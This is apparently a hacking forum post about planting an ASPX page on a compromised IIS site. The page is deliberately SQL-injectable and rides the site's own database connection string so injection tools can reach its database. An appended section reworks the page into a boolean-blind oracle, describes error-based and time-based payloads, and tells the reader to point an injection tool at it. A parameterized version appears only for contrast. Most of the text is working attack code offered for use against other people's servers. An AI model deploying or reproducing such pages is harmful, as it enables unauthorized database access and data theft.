Yesterday I was looking at a site with 4z1. Privilege escalation was really hard; we stared at it for a full 5 hours with no result. 2008 + IIS7, no sa, no root, no services of any kind...!
Along the way we used aspx constructed injection to go cross-site; I found a pile of code online and not one of them worked.
It isn't much code, so I just wrote my own and was done with it. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影 aspx constructed-injection page</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    <script language="c#" runat="server">
    // Runs on every request. The parameter value is concatenated straight into the SQL
    // text on purpose: this page is a deliberately injectable endpoint for an injection tool,
    // reusing the target site's own database connection.
    void Page_Init(object sender, EventArgs e)
    {
        System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();

        // Take the connection string from the site's web.config; replace ConnectionName
        // with the name of the <connectionStrings> entry you want to ride on.
        conn.ConnectionString = ConfigurationManager.ConnectionStrings["ConnectionName"].ConnectionString;
        conn.Open();

        string i = this.Page.Request.Params["xxser"]; // the injection parameter: ?xxser=15

        // Replace [Table] and ColumnName with a real table and a numeric column on the target.
        System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [Table] where ColumnName = " + i, conn);
        // ExecuteNonQuery returns -1 for a SELECT, so the number written below does not
        // change with the row count; what the tool sees is the SQL error raised by the
        // injected payload (or a time delay), not a true/false difference in the output.
        int x = command.ExecuteNonQuery();
        Response.Write(i + "\n");
        Response.Write(x);
        conn.Close();
    }
    </script>
    </div>
    </form>
</body>
</html>
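As an added example (not part of the original post and not 暗影's code), here is the same idea reworked so that an injection tool gets a usable true/false oracle instead of a constant -1. Because ExecuteNonQuery returns -1 for every SELECT, payloads like `15 and 1=1` and `15 and 1=2` produce identical output unless the query throws; switching to `select count(*)` via ExecuteScalar makes the two cases differ, while error-based payloads (for example a `convert(int, @@version)` that throws on MSSQL) and time-based `waitfor delay` payloads keep working. The connection name, the table and column, and the `safe` switch are placeholders assumed for illustration. The parameterized handler is included only for contrast, to show the one-line change that closes the hole:

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<%@ Import Namespace="System.Configuration" %>
<script runat="server">
    // Assumed placeholders: the <connectionStrings> entry, table and numeric column
    // must be replaced with ones that actually exist on the target.
    const string ConnName = "ConnectionName";
    const string CountSql = "select count(*) from [Table] where [ColumnName] = ";

    // Deliberately injectable: the raw parameter is appended to the SQL text.
    // With count(*) the response is a boolean oracle:
    //   ?xxser=15 and 1=1  -> number of rows with ColumnName = 15
    //   ?xxser=15 and 1=2  -> 0
    // A payload that raises a SQL error still surfaces through the ASP.NET error page
    // when customErrors is off, so error-based extraction works as before.
    static int CountInjectable(string id)
    {
        using (SqlConnection conn = new SqlConnection(ConfigurationManager.ConnectionStrings[ConnName].ConnectionString))
        using (SqlCommand cmd = new SqlCommand(CountSql + id, conn))
        {
            conn.Open();
            return Convert.ToInt32(cmd.ExecuteScalar());
        }
    }

    // Contrast: the same query with a typed parameter. The value never becomes SQL text,
    // and "15 and 1=1" is rejected by int.Parse before any query runs.
    static int CountParameterized(string id)
    {
        int value = int.Parse(id);
        using (SqlConnection conn = new SqlConnection(ConfigurationManager.ConnectionStrings[ConnName].ConnectionString))
        using (SqlCommand cmd = new SqlCommand("select count(*) from [Table] where [ColumnName] = @id", conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = value;
            conn.Open();
            return Convert.ToInt32(cmd.ExecuteScalar());
        }
    }

    void Page_Load(object sender, EventArgs e)
    {
        string id = Request.QueryString["xxser"];       // ?xxser=15
        bool safe = Request.QueryString["safe"] == "1"; // ?safe=1 selects the parameterized path (assumed switch)
        Response.ContentType = "text/plain";
        if (string.IsNullOrEmpty(id))
        {
            Response.Write("missing xxser");
            return;
        }
        int n = safe ? CountParameterized(id) : CountInjectable(id);
        Response.Write(n); // the tool compares this number, or the error page, between payloads
    }
</script>
```

Point an injection tool at `page.aspx?xxser=15` and it can run boolean-blind, error-based and time-based techniques against whatever database the site's connection string reaches; the `count(*)` oracle is what makes the boolean case possible. Hitting the same page with `&safe=1` shows the contrast: the typed parameter means the only thing the attacker controls is an integer value, which is why nothing in the original page should ever look like this in production code.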